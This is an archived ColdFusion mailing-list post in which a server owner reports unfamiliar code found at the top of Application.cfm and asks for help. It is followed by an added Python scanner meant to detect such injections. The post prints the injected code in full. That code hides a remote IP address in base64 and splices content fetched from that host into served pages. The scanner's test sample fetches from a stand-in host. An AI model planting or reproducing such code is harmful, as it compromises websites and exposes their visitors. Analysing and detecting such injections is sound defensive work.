I noticed my CF server started timing out a lot lately. Then I looked at the
code and on the Application.cfm page at the top was this code that I didn't put
there. Anybody know what this is and how it might have gotten on the
Application.cfm pages of the sites on this VPS? Not sure how it got there. Any
help in plugging this hole would be appreciated.
<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)><cfsavecontent
variable="paga"><CFHTTP METHOD = "Get" URL =
"http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">
<cfset mmy = cfhttp.FileContent><cfoutput>
#mmy#
</cfoutput>
</cfsavecontent>
<CFHTTP METHOD = "Get" URL =
"#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#">
<cfset cfs = cfhttp.FileContent>
<cfif (FindNoCase("</div>",paga) GT 0)>
<cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")>
<cfelseif (FindNoCase("</table>",paga) GT 0)>
<cfset paga = replace(paga, "</table>", "</table>#cfs#", "one")>
<cfelseif (FindNoCase("</a>",paga) GT 0)>
<cfset paga = replace(paga, "</a>", "</a>#cfs#", "one")>
<cfelse>
<cfset paga = replace(paga, "</body>", "#cfs#</body>", "one")>
</cfif>
<cfoutput>
#paga#
</cfoutput>
<cfabort>
</cfif>
<cffunction name="hSWaawe">
<cfargument name="HxzcGlk">
<cfset Ypg = ToString(ToBinary(HxzcGlk))>
<cfreturn Ypg>
</cffunction>
Archive:
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354227
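A defensive check for the kind of injection shown in the post, as an added example that is not part of the original message: it scans Application.cfm / Application.cfc files for the traits visible in the posted block (user-agent gate, CFHTTP URL built from a function call, ToString(ToBinary()) decoder, output followed by cfabort) and decodes base64 string literals to surface hidden URLs. The trait names, the two-trait threshold and the sample sources are assumptions constructed for illustration.

```python
import base64
import re
from pathlib import Path

# Quoted literals long enough to plausibly hide a base64-encoded URL.
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{16,}={0,2})['"]""")
# Traits of the injected block in the post; one alone is weak, several are not.
TRAITS = {
    "self_fetch": re.compile(r"<cfhttp[^>]*#\s*SERVER_NAME\s*#", re.I),
    "ua_gate": re.compile(r"FindNoCase\(\s*[\"'][^\"']+[\"']\s*,\s*(cgi\.)?http_user_agent", re.I),
    "tobinary_decoder": re.compile(r"ToString\(\s*ToBinary\(", re.I),
    "computed_cfhttp_url": re.compile(r"<cfhttp[^>]*url\s*=\s*\"#\w+\(", re.I),
    "abort_after_output": re.compile(r"</cfoutput>\s*<cfabort>", re.I),
}

def decode_literals(source):
    """Return printable ASCII strings recovered from base64 literals."""
    found = []
    for m in B64_LITERAL.finditer(source):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text
        if text.isprintable():
            found.append(text)
    return found

def scan(source):
    """Report matched traits and any URL hidden in a base64 literal."""
    hits = sorted(name for name, rx in TRAITS.items() if rx.search(source))
    urls = [t for t in decode_literals(source) if re.match(r"https?://", t, re.I)]
    return {"traits": hits, "hidden_urls": urls,
            "suspicious": bool(urls) or len(hits) >= 2}

def scan_tree(root):
    """Scan every Application.cfm / Application.cfc below root."""
    names = ("application.cfm", "application.cfc")
    files = (p for p in Path(root).rglob("*") if p.is_file() and p.name.lower() in names)
    results = {str(p): scan(p.read_text(errors="replace")) for p in files}
    return {path: r for path, r in results.items() if r["suspicious"]}

# Constructed samples (not from the post): one infected file, one clean file.
ENC = base64.b64encode(b"http://payload.example.invalid/inject.txt").decode()
SAMPLE_INFECTED = f'''<cfif (FindNoCase("BotName",http_user_agent) EQ 0)>
<cfhttp method="Get" url="#dec('{ENC}')#">
<cfoutput>#cfhttp.FileContent#</cfoutput>
<cfabort></cfif>
<cffunction name="dec"><cfargument name="s">
<cfreturn ToString(ToBinary(s))></cffunction>'''
SAMPLE_CLEAN = '<cfapplication name="shop">\n<cfset request.dsn = "shopdb">\n'
```

Point scan_tree() at the web roots on the server; a hit is a prompt to compare the file against a known-good copy, not proof of compromise on its own.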